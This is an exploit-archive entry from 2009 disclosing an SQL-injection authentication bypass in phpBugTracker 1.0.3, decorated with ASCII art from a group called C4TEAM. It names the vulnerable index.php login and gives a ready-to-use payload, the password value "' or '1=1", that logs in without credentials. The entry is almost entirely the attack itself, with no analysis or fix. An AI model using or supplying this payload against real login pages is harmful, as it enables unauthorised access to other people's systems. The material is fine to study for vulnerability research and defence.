id: 5257
date: 05/25/2009
title: phpBugTracker 1.0.3 (Auth Bypass) SQL Injection Vulnerability
author: ByALBAYX
cves: 

=============================================================
phpBugTracker 1.0.3 (Auth Bypass) SQL Injection Vulnerability
=============================================================


@~~===============TURKISH=================~~@

              _.--"""""--._
            .'             '.
           /                 \
          ;       C4TEAM      ;
          |                   |
          |                   |
          ;                   ;                   
           \ (`'--,    ,--'`) /
            \ \  _ )  ( _  / /                 
             ) )(')/  \(')( (
            (_ `""` /\ `""` _)
             \`"-, /  \ ,-"`/                       
              `\ / `""` \ /`
               |/\/\/\/\/\|                      
               |\        /|
               ; |/\/\/\| ;
                \`-`--`-`/
                 \      /
                  ',__,'


@~~=======================================~~@
@~~=Script   : phpBugTracker 1.0.3

@~~=S.Site   : http://phpbt.sourceforge.net

@~~=Demo     : http://phpbt.sourceforge.net/demo
@~~=======================================~~@

@~~=Vul :

@~~=http://c4team.org/ [Path] /index.php

@~~=Email     : xxx@c4team.org

@~~=Password  : ' or '1=1

@~~=======================================~~@

@~~=:/




#  0day.today [2023-03-24]  #